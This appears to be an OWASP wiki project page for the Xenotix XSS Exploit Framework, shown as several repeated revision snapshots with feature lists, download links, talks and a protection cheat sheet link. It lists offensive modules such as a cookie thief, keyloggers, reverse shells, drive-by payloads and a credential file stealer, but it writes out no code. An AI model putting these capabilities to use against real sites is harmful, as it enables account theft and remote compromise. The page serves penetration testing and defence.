*Version 5 http://opensecurity.in/downloads/OWASP_Xenotix_XSS_Exploit_Framework_V5.rar | MD5: bdfce2d4af4012ecc20b86bed876a54a
*Version 4.5 http://opensecurity.in/downloads/Xenotix_XSS_Exploit_Framework_v4.5.rar
*Version 4 https://www.dropbox.com/s/ookdse6pyszh736/Xenotix%20XSS%20Exploit%20Framework%20V4.rar
*Version 3 https://www.owasp.org/index.php/File:OWASP_Xenotix_XSS_Exploit_Framework_v3_2013.zip
*Version 2 https://www.owasp.org/index.php/File:Xenotix_XSS_Exploit_Framework_2013_v2.zip
*Version 1 https://www.owasp.org/index.php/File:Xenotix_XSS_Exploitation_Framework.zip
====Source====
* GitHub https://github.com/ajinabraham/OWASP-Xenotix-XSS-Exploit-Framework/
</div>
= Documentation =

<div style="font-size:120%;border:none;margin: 0;color:#000">

Check: https://www.youtube.com/playlist?list=PLX3EwmWe0cS80ls3TsNiukQD0hfZjLHnP

</div>

= Roadmap =

<div style="font-size:120%;border:none;margin: 0;color:#000">
''' WHAT'S NEW! '''
==V6.1 Changes==
* Bug Fixes
* Updated QuickPHP Server
* Local DOM XSS Analyzer
==V6 Changes==
{{#ev:youtube|RhGVuus_NJw}}
* Intelli Fuzzer
* Context Based Fuzzer
* Blind Fuzzer
* HTA Network Configuration
* HTA Drive-By
* HTA Drive-By Reverse Shell
* JSFuck 6 Char Encoder
* jjencode Encoder
* aaencode Encoder
* IP to Location
* IP to GeoLocation
* IP Hinting
* Download Spoofer
* HTML5 Geolocation API
* Reverse TCP Shell Addon (Linux)
* OAuth 1.0a Request Scanner
* 4800+ Payloads
* SSL Error Fixed

==V5 Changes==
* Xenotix Scripting Engine
* Xenotix API
* V4.5 Bug Fixes
* GET Network IP (Information Gathering)
* QR Code Generator for Xenotix xook
* HTML5 WebCam Screenshot(Exploitation Module)
* HTML5 Get Page Screenshot (Exploitation Module)
* Find Feature in View Source.
* Improved Payload Count to 1630
* Name Changes

==V4.5 Changes==

* JavaScript Beautifier
* Pause and Resume support for Scan
* Jump to Payload
* Cookie Support for POST Request
* Cookie Support and Custom Headers for Header Scanner
* Added TRACE method Support
* Improved Interface
* Better Proxy Support
* WAF Fingerprinting
* Load Files <exploitation module>
* Hash Calculator
* Hash Detector
</div>

= XSS Protection Cheat Sheet =

[[Image:Xss_protection.png|center]]

The Ultimate XSS Protection Cheat Sheet for Developers is a compilation of information available on XSS Protection from various organization, researchers, websites, and from our own experience.
This document follows a simple language and justifying explanations that helps a developer to implement the correct XSS defense and to build a secure web application that prevents XSS vulnerability and Post XSS attacks. It will also discuss about the existing methods or functions provided by various programming languages to mitigate XSS vulnerability. This document will be updated regularly in order to include updated and correct in information in the domain of XSS Protection.

VIEW: [https://docs.google.com/viewer?srcid=0B_Ci-1YbMqshWUtlaGRyLVBVd28&pid=explorer&efh=false&a=v&chrome=false&embedded=true THE ULTIMATE XSS PROTECTION CHEAT SHEET FOR DEVELOPERS]

= Get Involved =

<div style="font-size:120%;border:none;margin: 0;color:#000">

Involvement in the development of Xenotix is highly encouraged!

Here are some of the ways you can help:

==Support Us==

*Twitter Page: [https://twitter.com/Xenotix Xenotix on Twitter]
*Facebook Page: [https://www.facebook.com/xenotix Xenotix on Facebook]
*Official Page: [[http://www.opensecurity.in/owasp-xenotix-xss-exploit-framework-v4-2013 Xenotix @ OpenSecurity]]

==Feedback & Queries==

* Do you have any issues with it?
* Do you find any design flows or errors?
* Do you need help in using it?
* Do you have something to tell about it?

Then please use this form: https://docs.google.com/forms/d/1RpUhQvuHGvPTl7Gi-EXzecidGvJwKpsRaY9-MeXm1ro/viewform

==Development==

Are you a developer? Do you have some cool ideas to contribute? Get in touch via '''ajin [DOT] abraham [AT] owasp.org'''
If you actively contribute to Xenotix then you will be invited to join the project.

</div>

__NOTOC__ <headertabs />

[[Category:OWASP Project]] [[Category:OWASP_Breakers]] [[Category:OWASP_Defenders]]
[[Category:OWASP_Project|Xenotix XSS Exploit Framework Project]] [[Category:OWASP_Tool]] [[Category:OWASP_Release_Quality_Tool|OWASP Release Quality Tool]] [[Category:OWASP_Download]]

OWASP Xenotix XSS Exploit Framework

2014-12-08T12:02:23Z

Ajin Abraham: documentation

=Main=

<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div>

{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-
| valign="top" style="border-right: 1px dotted gray;padding-right:20px;" |

==OWASP Xenotix XSS Exploit Framework==

[[Image:Xen6.png|left|550px]]
'''OWASP Xenotix XSS Exploit Framework''' is an advanced Cross Site Scripting (XSS) vulnerability detection and exploitation framework. Xenotix provides Zero False Positive XSS Detection by performing the Scan within the browser engines where in real world, payloads get reflected. Xenotix Scanner Module is incorporated with 3 intelligent fuzzers to reduce the scan time and produce better results. If you really don't like the tool logic, then leverage the power of Xenotix API to make the tool work like you wanted it to be.
It is claimed to have the world’s 2nd largest XSS Payloads of about 4800+ distinctive XSS Payloads. It is incorporated with a feature rich Information Gathering module for target Reconnaissance. The Exploit Framework includes real world offensive XSS exploitation modules for Penetration Testing and Proof of Concept creation. Say no to alert pop-ups in PoC. Pen testers can now create appealing Proof of Concepts within few clicks.

<paypal>OWASP Xenotix XSS Exploit Framework</paypal>

== LICENSING ==
OWASP Xenotix XSS Exploit Framework is free to use. It is licensed under the http://creativecommons.org/licenses/by-sa/3.0/ Creative Commons Attribution-ShareAlike 3.0 license], so you can copy, distribute and transmit the work, and you can adapt it, and use it commercially, but all provided that you attribute the work and if you alter, transform, or build upon this work, you may distribute the resulting work only under the same or similar license to this one.

| valign="top" style="padding-left:25px;width:175px;border-right: 1px dotted gray;padding-right:25px;" |

== PRESENTATIONS ==

'''DEFCON DCG Banglore 2013'''
*Presentation: [http://www.slideshare.net/ajin25/pwning-with-xss-from-alert-to-reverse-shell-defcon-banglore-2013 OWASP Xenotix XSS Exploit Framework v4 ]

'''BlackHat Europe Arsenal 2013'''
*Presentation: [https://www.dropbox.com/s/o8adyvtngbszq32/blackhat.zip OWASP Xenotix XSS Exploit Framework v3 ]

'''Nulcon Goa 2013'''
*Presentation: [http://www.slideshare.net/ajin25/owasp-xenotix-xss-exploit-framework-v3-nullcon-goa-2013 OWASP Xenotix XSS Exploit Framework v3 ]
'''ClubHack 2012'''
*Presentation: [http://www.slideshare.net/ajin25/xenotix-xss-exploit-framework-clubhack-2012 OWASP Xenotix XSS Exploit Framework v2]

== PROJECT LEADER ==

Ajin Abraham | [https://twitter.com/ajinabraham @ajinabraham]

== PROJECT WEBSITE ==

*http://xenotix.in

== AWARDS ==

[[Image:ToolsWatch.png‎ |180px | thumb | left |link=http://www.toolswatch.org/2013/12/2013-top-security-tools-as-voted-by-toolswatch-org-readers/ | Top 5th Security Tool of 2013]]
[[Image:CSPF.jpg |180px | thumb | left | Recommended by CSPF]]

| valign="top" style="padding-left:25px;width:175px;" |

== QUICK DOWNLOAD ==

[[Image:Dwd.png |200px| link=http://opensecurity.in/downloads/OWASP_Xenotix_XSS_Exploit_Framework_V6.1.zip]]

== NEWS AND EVENTS ==
* [08 Dec 2014] Xenotix XSS Exploit Framework V6.1 is Released
* [14 Sept 2014] Xenotix XSS Exploit Framework V6 is Released
* [14 Feb 2014] Xenotix XSS Exploit Framework V5 is Released
* [16 Dec 2013] [http://www.toolswatch.org/2013/12/2013-top-security-tools-as-voted-by-toolswatch-org-readers/ Top 5th Security tool of 2013, voted by ToolsWatch Readers]
* [10 Nov 2013] [http://holisticinfosec.org/toolsmith/pdf/november2013.pdf OWASP Xenotix in ISSA Journal]
* [01 Nov 2013] [http://holisticinfosec.blogspot.in/2013/11/toolsmith-owasp-xenotix-xss-exploit.html Toolsmith Tool of the Month]

== RELATED PROJECTS ==

* [[OWASP_Xelenium_Project]]
* [[ZAP]]
* [[OWASP_XSSER]]

== CLASSIFICATIONS ==

{| width="200" cellpadding="2"
|-
| align="center" valign="top" width="50%" rowspan="2"| [[File:Owasp-incubator-trans-85.png|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Incubator_Projects]]
| align="center" valign="top" width="50%"| [[File:Owasp-builders-small.png|link=]]
|-
| align="center" valign="top" width="50%"| [[File:Owasp-breakers-small.png|link=]]
|-
| colspan="2" align="center" | [[File:Cc-button-y-sa-small.png|link=http://creativecommons.org/licenses/by-sa/3.0/]]
|-
| colspan="2" align="center" | [[File:Project_Type_Files_CODE.jpg|link=]]
|}

|}

= Features =

<div style="font-size:120%;border:none;margin: 0;color:#000">

'''SCANNER MODULES'''

*GET Request Fuzzer
*POST Request Fuzzer
*Advanced Request Fuzzer
*OAuth 1.0a Request Scanner
*DOM Scanner
**DOM XSS Analyzer
**Local DOM XSS Analyzer
*Hidden Parameter Detector

'''INFORMATION GATHERING MODULES'''

*WAF Fingerprinting
*Victim Fingerprinting
**IP to Location
**IP to GeoLocation
*Network
**Network IP (WebRTC)
**Ping Scan
**Port Scan
**Internal Network Scan
*Browser
**Fingerprinting
**Features Detector

'''EXPLOITATION MODULES'''

*Send Message
*Cookie Thief
*Keylogger
*HTML5 DDoSer
*Load File
*Grab Page Screenshot
*JavaScript Shell
*Reverse HTTP WebShell
*Metasploit Browser Exploit
*Social Engineering
**Phisher
**Tabnabbing
**Live WebCam Screenshot
**Download Spoofer
**Geolocation HTML5 API
**Java Applet Drive-By (Windows)
**Java Applet Drive-By Reverse Shell (Windows)
**HTA Network Configuration (Windows, IE)
**HTA Drive-By (Windows, IE)
**HTA Drive-By Reverse Shell (Windows, IE)
*Firefox Addons
**Reverse TCP Shell Addon (Windows, Persistent)
**Reverse TCP Shell Addon (Linux, Persistent)
**Session Stealer Addon (Persistent)
**Keylogger Addon (Persistent)
**DDoSer Addon (Persistent)
**Linux Credential File Stealer Addon (Persistent)
**Drop and Execute Addon (Persistent)

'''AUXILIARY MODULES'''
*WebKit Developer Tools
*Encoder/Decoder
*JavaScript Encoders
**JSFuck 6 Char Encoder
**jjencode Encoder
**aaencode Encoder
*JavaScript Beautifier
*Hash Calculator
*Hash Detector
*View Injected JavaScript
*View XSS Payloads

'''XENOTIX SCRIPTING ENGINE'''
* Xenotix API
* IronPython Scripting Support
* Trident and Gecko Web Engine Support

</div>

= Conference Talks =

<div style="font-size:120%;border:none;margin: 0;color:#000">

''' NULLCON GOA 2013 '''

{{#ev:youtube|J1phYXmLX8w}}

''' CLUBHACK 2012 '''

{{#ev:youtube|NYZLP0q7-y4}}

</div>

= Screenshots =

{|
|-
|
[[Image:POST_SCANNER.png|500px|thumb|right|Xenotix POST Request Scanner]]
|
[[Image:XENOTIX INFO.png|500px|thumb|left|Xenotix Information Gathering Modules]]
|-
|
[[Image:XENOTIX EXPLOITATION.png|thumb|500px|right|Xenotix Exploitation Modules]]
|
[[Image:Scripting.png|thumb|500px|left|Xenotix Scripting Engine]]
|}

=Downloads=

<div style="font-size:120%;border:none;margin: 0;color:#000">

====IMPORTANT====
Antivirus Solutions may detect it as a threat. However it is due to the features in the exploitation framework.

====Latest Release====

[[Image:Dwd.png | 200px | link=http://opensecurity.in/downloads/OWASP_Xenotix_XSS_Exploit_Framework_V6.1.zip]]
* Mirror [https://drive.google.com/file/d/0B_Ci-1YbMqshNm5WRlRRTllqcG8/view Download V6.1 From GDrive]
MD5: 17c703f90dbb4f09b112284232bbb69f

====Requirements====
* Microsoft .NET Framework 4.5 http://www.microsoft.com/en-in/download/details.aspx?id=30653
* IronPython 2.7.3 http://ironpython.codeplex.com/downloads/get/423690 [If you are using Scripting Engine]
====Older Versions====
*Version 6 http://opensecurity.in/downloads/OWASP_Xenotix_XSS_Exploit_Framework_V6.zip | MD5: 54a2335e35c47b1e5a87b163088c63ff
*Version 5 http://opensecurity.in/downloads/OWASP_Xenotix_XSS_Exploit_Framework_V5.rar | MD5: bdfce2d4af4012ecc20b86bed876a54a
*Version 4.5 http://opensecurity.in/downloads/Xenotix_XSS_Exploit_Framework_v4.5.rar
*Version 4 https://www.dropbox.com/s/ookdse6pyszh736/Xenotix%20XSS%20Exploit%20Framework%20V4.rar
*Version 3 https://www.owasp.org/index.php/File:OWASP_Xenotix_XSS_Exploit_Framework_v3_2013.zip
*Version 2 https://www.owasp.org/index.php/File:Xenotix_XSS_Exploit_Framework_2013_v2.zip
*Version 1 https://www.owasp.org/index.php/File:Xenotix_XSS_Exploitation_Framework.zip
====Source====
* GitHub https://github.com/ajinabraham/OWASP-Xenotix-XSS-Exploit-Framework/
</div>
= Documentation =

<div style="font-size:120%;border:none;margin: 0;color:#000">

Check: https://www.youtube.com/playlist?list=PLX3EwmWe0cS80ls3TsNiukQD0hfZjLHnP

</div>

= Roadmap =

<div style="font-size:120%;border:none;margin: 0;color:#000">
''' WHAT'S NEW! '''
==V6.1 Changes==
* Bug Fixes
* Updated QuickPHP Server
* Local DOM XSS Analyzer
{{#ev:youtube|RhGVuus_NJw}}
==V6 Changes==

* Intelli Fuzzer
* Context Based Fuzzer
* Blind Fuzzer
* HTA Network Configuration
* HTA Drive-By
* HTA Drive-By Reverse Shell
* JSFuck 6 Char Encoder
* jjencode Encoder
* aaencode Encoder
* IP to Location
* IP to GeoLocation
* IP Hinting
* Download Spoofer
* HTML5 Geolocation API
* Reverse TCP Shell Addon (Linux)
* OAuth 1.0a Request Scanner
* 4800+ Payloads
* SSL Error Fixed

==V5 Changes==
* Xenotix Scripting Engine
* Xenotix API
* V4.5 Bug Fixes
* GET Network IP (Information Gathering)
* QR Code Generator for Xenotix xook
* HTML5 WebCam Screenshot(Exploitation Module)
* HTML5 Get Page Screenshot (Exploitation Module)
* Find Feature in View Source.
* Improved Payload Count to 1630
* Name Changes

==V4.5 Changes==

* JavaScript Beautifier
* Pause and Resume support for Scan
* Jump to Payload
* Cookie Support for POST Request
* Cookie Support and Custom Headers for Header Scanner
* Added TRACE method Support
* Improved Interface
* Better Proxy Support
* WAF Fingerprinting
* Load Files <exploitation module>
* Hash Calculator
* Hash Detector
</div>

= XSS Protection Cheat Sheet =

[[Image:Xss_protection.png|center]]

The Ultimate XSS Protection Cheat Sheet for Developers is a compilation of information available on XSS Protection from various organization, researchers, websites, and from our own experience.
This document follows a simple language and justifying explanations that helps a developer to implement the correct XSS defense and to build a secure web application that prevents XSS vulnerability and Post XSS attacks. It will also discuss about the existing methods or functions provided by various programming languages to mitigate XSS vulnerability. This document will be updated regularly in order to include updated and correct in information in the domain of XSS Protection.

VIEW: [https://docs.google.com/viewer?srcid=0B_Ci-1YbMqshWUtlaGRyLVBVd28&pid=explorer&efh=false&a=v&chrome=false&embedded=true THE ULTIMATE XSS PROTECTION CHEAT SHEET FOR DEVELOPERS]

= Get Involved =

<div style="font-size:120%;border:none;margin: 0;color:#000">

Involvement in the development of Xenotix is highly encouraged!

Here are some of the ways you can help:

==Support Us==

*Twitter Page: [https://twitter.com/Xenotix Xenotix on Twitter]
*Facebook Page: [https://www.facebook.com/xenotix Xenotix on Facebook]
*Official Page: [[http://www.opensecurity.in/owasp-xenotix-xss-exploit-framework-v4-2013 Xenotix @ OpenSecurity]]

==Feedback & Queries==

* Do you have any issues with it?
* Do you find any design flows or errors?
* Do you need help in using it?
* Do you have something to tell about it?

Then please use this form: https://docs.google.com/forms/d/1RpUhQvuHGvPTl7Gi-EXzecidGvJwKpsRaY9-MeXm1ro/viewform

==Development==

Are you a developer? Do you have some cool ideas to contribute? Get in touch via '''ajin [DOT] abraham [AT] owasp.org'''
If you actively contribute to Xenotix then you will be invited to join the project.

</div>

__NOTOC__ <headertabs />

[[Category:OWASP Project]] [[Category:OWASP_Breakers]] [[Category:OWASP_Defenders]]
[[Category:OWASP_Project|Xenotix XSS Exploit Framework Project]] [[Category:OWASP_Tool]] [[Category:OWASP_Release_Quality_Tool|OWASP Release Quality Tool]] [[Category:OWASP_Download]]

OWASP Xenotix XSS Exploit Framework

2014-12-08T11:59:12Z

Ajin Abraham: v6.1

=Main=

<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div>

{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-
| valign="top" style="border-right: 1px dotted gray;padding-right:20px;" |

==OWASP Xenotix XSS Exploit Framework==

[[Image:Xen6.png|left|550px]]
'''OWASP Xenotix XSS Exploit Framework''' is an advanced Cross Site Scripting (XSS) vulnerability detection and exploitation framework. Xenotix provides Zero False Positive XSS Detection by performing the Scan within the browser engines where in real world, payloads get reflected. Xenotix Scanner Module is incorporated with 3 intelligent fuzzers to reduce the scan time and produce better results. If you really don't like the tool logic, then leverage the power of Xenotix API to make the tool work like you wanted it to be.
It is claimed to have the world’s 2nd largest XSS Payloads of about 4800+ distinctive XSS Payloads. It is incorporated with a feature rich Information Gathering module for target Reconnaissance. The Exploit Framework includes real world offensive XSS exploitation modules for Penetration Testing and Proof of Concept creation. Say no to alert pop-ups in PoC. Pen testers can now create appealing Proof of Concepts within few clicks.

<paypal>OWASP Xenotix XSS Exploit Framework</paypal>

== LICENSING ==
OWASP Xenotix XSS Exploit Framework is free to use. It is licensed under the http://creativecommons.org/licenses/by-sa/3.0/ Creative Commons Attribution-ShareAlike 3.0 license], so you can copy, distribute and transmit the work, and you can adapt it, and use it commercially, but all provided that you attribute the work and if you alter, transform, or build upon this work, you may distribute the resulting work only under the same or similar license to this one.

| valign="top" style="padding-left:25px;width:175px;border-right: 1px dotted gray;padding-right:25px;" |

== PRESENTATIONS ==

'''DEFCON DCG Banglore 2013'''
*Presentation: [http://www.slideshare.net/ajin25/pwning-with-xss-from-alert-to-reverse-shell-defcon-banglore-2013 OWASP Xenotix XSS Exploit Framework v4 ]

'''BlackHat Europe Arsenal 2013'''
*Presentation: [https://www.dropbox.com/s/o8adyvtngbszq32/blackhat.zip OWASP Xenotix XSS Exploit Framework v3 ]

'''Nulcon Goa 2013'''
*Presentation: [http://www.slideshare.net/ajin25/owasp-xenotix-xss-exploit-framework-v3-nullcon-goa-2013 OWASP Xenotix XSS Exploit Framework v3 ]
'''ClubHack 2012'''
*Presentation: [http://www.slideshare.net/ajin25/xenotix-xss-exploit-framework-clubhack-2012 OWASP Xenotix XSS Exploit Framework v2]

== PROJECT LEADER ==

Ajin Abraham | [https://twitter.com/ajinabraham @ajinabraham]

== PROJECT WEBSITE ==

*http://xenotix.in

== AWARDS ==

[[Image:ToolsWatch.png‎ |180px | thumb | left |link=http://www.toolswatch.org/2013/12/2013-top-security-tools-as-voted-by-toolswatch-org-readers/ | Top 5th Security Tool of 2013]]
[[Image:CSPF.jpg |180px | thumb | left | Recommended by CSPF]]

| valign="top" style="padding-left:25px;width:175px;" |

== QUICK DOWNLOAD ==

[[Image:Dwd.png |200px| link=http://opensecurity.in/downloads/OWASP_Xenotix_XSS_Exploit_Framework_V6.1.zip]]

== NEWS AND EVENTS ==
* [08 Dec 2014] Xenotix XSS Exploit Framework V6.1 is Released
* [14 Sept 2014] Xenotix XSS Exploit Framework V6 is Released
* [14 Feb 2014] Xenotix XSS Exploit Framework V5 is Released
* [16 Dec 2013] [http://www.toolswatch.org/2013/12/2013-top-security-tools-as-voted-by-toolswatch-org-readers/ Top 5th Security tool of 2013, voted by ToolsWatch Readers]
* [10 Nov 2013] [http://holisticinfosec.org/toolsmith/pdf/november2013.pdf OWASP Xenotix in ISSA Journal]
* [01 Nov 2013] [http://holisticinfosec.blogspot.in/2013/11/toolsmith-owasp-xenotix-xss-exploit.html Toolsmith Tool of the Month]

== RELATED PROJECTS ==

* [[OWASP_Xelenium_Project]]
* [[ZAP]]
* [[OWASP_XSSER]]

== CLASSIFICATIONS ==

{| width="200" cellpadding="2"
|-
| align="center" valign="top" width="50%" rowspan="2"| [[File:Owasp-incubator-trans-85.png|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Incubator_Projects]]
| align="center" valign="top" width="50%"| [[File:Owasp-builders-small.png|link=]]
|-
| align="center" valign="top" width="50%"| [[File:Owasp-breakers-small.png|link=]]
|-
| colspan="2" align="center" | [[File:Cc-button-y-sa-small.png|link=http://creativecommons.org/licenses/by-sa/3.0/]]
|-
| colspan="2" align="center" | [[File:Project_Type_Files_CODE.jpg|link=]]
|}

|}

= Features =

<div style="font-size:120%;border:none;margin: 0;color:#000">

'''SCANNER MODULES'''

*GET Request Fuzzer
*POST Request Fuzzer
*Advanced Request Fuzzer
*OAuth 1.0a Request Scanner
*DOM XSS Analyzer
*Local DOM XSS Analyzer
*Hidden Parameter Detector

'''INFORMATION GATHERING MODULES'''

*WAF Fingerprinting
*Victim Fingerprinting
**IP to Location
**IP to GeoLocation
*Network
**Network IP (WebRTC)
**Ping Scan
**Port Scan
**Internal Network Scan
*Browser
**Fingerprinting
**Features Detector

'''EXPLOITATION MODULES'''

*Send Message
*Cookie Thief
*Keylogger
*HTML5 DDoSer
*Load File
*Grab Page Screenshot
*JavaScript Shell
*Reverse HTTP WebShell
*Metasploit Browser Exploit
*Social Engineering
**Phisher
**Tabnabbing
**Live WebCam Screenshot
**Download Spoofer
**Geolocation HTML5 API
**Java Applet Drive-By (Windows)
**Java Applet Drive-By Reverse Shell (Windows)
**HTA Network Configuration (Windows, IE)
**HTA Drive-By (Windows, IE)
**HTA Drive-By Reverse Shell (Windows, IE)
*Firefox Addons
**Reverse TCP Shell Addon (Windows, Persistent)
**Reverse TCP Shell Addon (Linux, Persistent)
**Session Stealer Addon (Persistent)
**Keylogger Addon (Persistent)
**DDoSer Addon (Persistent)
**Linux Credential File Stealer Addon (Persistent)
**Drop and Execute Addon (Persistent)

'''AUXILIARY MODULES'''
*WebKit Developer Tools
*Encoder/Decoder
*JavaScript Encoders
**JSFuck 6 Char Encoder
**jjencode Encoder
**aaencode Encoder
*JavaScript Beautifier
*Hash Calculator
*Hash Detector
*View Injected JavaScript
*View XSS Payloads

'''XENOTIX SCRIPTING ENGINE'''
* Xenotix API
* IronPython Scripting Support
* Trident and Gecko Web Engine Support

</div>

= Conference Talks =

<div style="font-size:120%;border:none;margin: 0;color:#000">

''' NULLCON GOA 2013 '''

{{#ev:youtube|J1phYXmLX8w}}

''' CLUBHACK 2012 '''

{{#ev:youtube|NYZLP0q7-y4}}

</div>

= Screenshots =

{|
|-
|
[[Image:POST_SCANNER.png|500px|thumb|right|Xenotix POST Request Scanner]]
|
[[Image:XENOTIX INFO.png|500px|thumb|left|Xenotix Information Gathering Modules]]
|-
|
[[Image:XENOTIX EXPLOITATION.png|thumb|500px|right|Xenotix Exploitation Modules]]
|
[[Image:Scripting.png|thumb|500px|left|Xenotix Scripting Engine]]
|}

=Downloads=

<div style="font-size:120%;border:none;margin: 0;color:#000">

====IMPORTANT====
Antivirus Solutions may detect it as a threat. However it is due to the features in the exploitation framework.

====Latest Release====

[[Image:Dwd.png | 200px | link=http://opensecurity.in/downloads/OWASP_Xenotix_XSS_Exploit_Framework_V6.1.zip]]
* Mirror [https://drive.google.com/file/d/0B_Ci-1YbMqshNm5WRlRRTllqcG8/view Download V6.1 From GDrive]
MD5: 17c703f90dbb4f09b112284232bbb69f

====Requirements====
* Microsoft .NET Framework 4.5 http://www.microsoft.com/en-in/download/details.aspx?id=30653
* IronPython 2.7.3 http://ironpython.codeplex.com/downloads/get/423690 [If you are using Scripting Engine]
====Older Versions====
*Version 6 http://opensecurity.in/downloads/OWASP_Xenotix_XSS_Exploit_Framework_V6.zip | MD5: 54a2335e35c47b1e5a87b163088c63ff
*Version 5 http://opensecurity.in/downloads/OWASP_Xenotix_XSS_Exploit_Framework_V5.rar | MD5: bdfce2d4af4012ecc20b86bed876a54a
*Version 4.5 http://opensecurity.in/downloads/Xenotix_XSS_Exploit_Framework_v4.5.rar
*Version 4 https://www.dropbox.com/s/ookdse6pyszh736/Xenotix%20XSS%20Exploit%20Framework%20V4.rar
*Version 3 https://www.owasp.org/index.php/File:OWASP_Xenotix_XSS_Exploit_Framework_v3_2013.zip
*Version 2 https://www.owasp.org/index.php/File:Xenotix_XSS_Exploit_Framework_2013_v2.zip
*Version 1 https://www.owasp.org/index.php/File:Xenotix_XSS_Exploitation_Framework.zip
====Source====
* GitHub https://github.com/ajinabraham/OWASP-Xenotix-XSS-Exploit-Framework/
</div>
= Documentation =

<div style="font-size:120%;border:none;margin: 0;color:#000">

'''Introduction to OWASP Xenotix XSS Exploit Framework'''

{{#ev:youtube|C15po4TK4Os}}

'''Detecting XSS in GET Request'''

{{#ev:youtube|fPC_stgovcU}}

'''Detecting XSS with GET Request Fuzzer'''

{{#ev:youtube|K5nbgvXvY1g}}

'''Detecting XSS with POST Request Fuzzer'''

{{#ev:youtube|AqdEG-vsywQ}}

'''Detecting XSS with POST Request Fuzzer in an Authenticated Page'''

{{#ev:youtube|J_qdm_-XVV0}}

'''Detecting XSS with Advanced Request Fuzzer'''

{{#ev:youtube|R8AgEWPFJ1g}}

'''XSS Filter Bypass, Detection and Explanation with OWASP Xenotix'''

{{#ev:youtube|loZSdedJnqc}}

'''Version 4.5 Videos'''

{{#ev:youtube|jm1-_nTlhzY}}

'''Version 4 Videos'''

{{#ev:youtube|dCo5BCJWOdA}}

'''Version 3 Videos'''

{{#ev:youtube|CJEgO4_kd-8}}
{{#ev:youtube|owfF9C_Xerw}}
{{#ev:youtube|i8c3kf4t6A8}}
{{#ev:youtube|IT-8IH3yRrA}}
{{#ev:youtube|cgLGgVWvi9Y}}

</div>

= Roadmap =

<div style="font-size:120%;border:none;margin: 0;color:#000">
''' WHAT'S NEW! '''
==V6.1 Changes==
* Bug Fixes
* Updated QuickPHP Server
* Local DOM XSS Analyzer
{{#ev:youtube|RhGVuus_NJw}}
==V6 Changes==

* Intelli Fuzzer
* Context Based Fuzzer
* Blind Fuzzer
* HTA Network Configuration
* HTA Drive-By
* HTA Drive-By Reverse Shell
* JSFuck 6 Char Encoder
* jjencode Encoder
* aaencode Encoder
* IP to Location
* IP to GeoLocation
* IP Hinting
* Download Spoofer
* HTML5 Geolocation API
* Reverse TCP Shell Addon (Linux)
* OAuth 1.0a Request Scanner
* 4800+ Payloads
* SSL Error Fixed

==V5 Changes==
* Xenotix Scripting Engine
* Xenotix API
* V4.5 Bug Fixes
* GET Network IP (Information Gathering)
* QR Code Generator for Xenotix xook
* HTML5 WebCam Screenshot(Exploitation Module)
* HTML5 Get Page Screenshot (Exploitation Module)
* Find Feature in View Source.
* Improved Payload Count to 1630
* Name Changes

==V4.5 Changes==

* JavaScript Beautifier
* Pause and Resume support for Scan
* Jump to Payload
* Cookie Support for POST Request
* Cookie Support and Custom Headers for Header Scanner
* Added TRACE method Support
* Improved Interface
* Better Proxy Support
* WAF Fingerprinting
* Load Files <exploitation module>
* Hash Calculator
* Hash Detector
</div>

= XSS Protection Cheat Sheet =

[[Image:Xss_protection.png|center]]

The Ultimate XSS Protection Cheat Sheet for Developers is a compilation of information available on XSS Protection from various organization, researchers, websites, and from our own experience.
This document follows a simple language and justifying explanations that helps a developer to implement the correct XSS defense and to build a secure web application that prevents XSS vulnerability and Post XSS attacks. It will also discuss about the existing methods or functions provided by various programming languages to mitigate XSS vulnerability. This document will be updated regularly in order to include updated and correct in information in the domain of XSS Protection.

VIEW: [https://docs.google.com/viewer?srcid=0B_Ci-1YbMqshWUtlaGRyLVBVd28&pid=explorer&efh=false&a=v&chrome=false&embedded=true THE ULTIMATE XSS PROTECTION CHEAT SHEET FOR DEVELOPERS]

= Get Involved =

<div style="font-size:120%;border:none;margin: 0;color:#000">

Involvement in the development of Xenotix is highly encouraged!

Here are some of the ways you can help:

==Support Us==

*Twitter Page: [https://twitter.com/Xenotix Xenotix on Twitter]
*Facebook Page: [https://www.facebook.com/xenotix Xenotix on Facebook]
*Official Page: [[http://www.opensecurity.in/owasp-xenotix-xss-exploit-framework-v4-2013 Xenotix @ OpenSecurity]]

==Feedback & Queries==

* Do you have any issues with it?
* Do you find any design flows or errors?
* Do you need help in using it?
* Do you have something to tell about it?

Then please use this form: https://docs.google.com/forms/d/1RpUhQvuHGvPTl7Gi-EXzecidGvJwKpsRaY9-MeXm1ro/viewform

==Development==

Are you a developer? Do you have some cool ideas to contribute? Get in touch via '''ajin [DOT] abraham [AT] owasp.org'''
If you actively contribute to Xenotix then you will be invited to join the project.

</div>

__NOTOC__ <headertabs />

[[Category:OWASP Project]] [[Category:OWASP_Breakers]] [[Category:OWASP_Defenders]]
[[Category:OWASP_Project|Xenotix XSS Exploit Framework Project]] [[Category:OWASP_Tool]] [[Category:OWASP_Release_Quality_Tool|OWASP Release Quality Tool]] [[Category:OWASP_Download]]

OWASP Xenotix XSS Exploit Framework

2014-11-28T09:34:36Z

Ajin Abraham: /* QUICK DOWNLOAD */

=Main=

<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div>

{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-
| valign="top" style="border-right: 1px dotted gray;padding-right:20px;" |

==OWASP Xenotix XSS Exploit Framework 6==

[[Image:Xen6.png|left|550px]]
'''OWASP Xenotix XSS Exploit Framework''' is an advanced Cross Site Scripting (XSS) vulnerability detection and exploitation framework. Xenotix provides Zero False Positive XSS Detection by performing the Scan within the browser engines where in real world, payloads get reflected. Xenotix Scanner Module is incorporated with 3 intelligent fuzzers to reduce the scan time and produce better results. If you really don't like the tool logic, then leverage the power of Xenotix API to make the tool work like you wanted it to be.
It is claimed to have the world’s 2nd largest XSS Payloads of about 4800+ distinctive XSS Payloads. It is incorporated with a feature rich Information Gathering module for target Reconnaissance. The Exploit Framework includes real world offensive XSS exploitation modules for Penetration Testing and Proof of Concept creation. Say no to alert pop-ups in PoC. Pen testers can now create appealing Proof of Concepts within few clicks.

<paypal>OWASP Xenotix XSS Exploit Framework</paypal>

== LICENSING ==
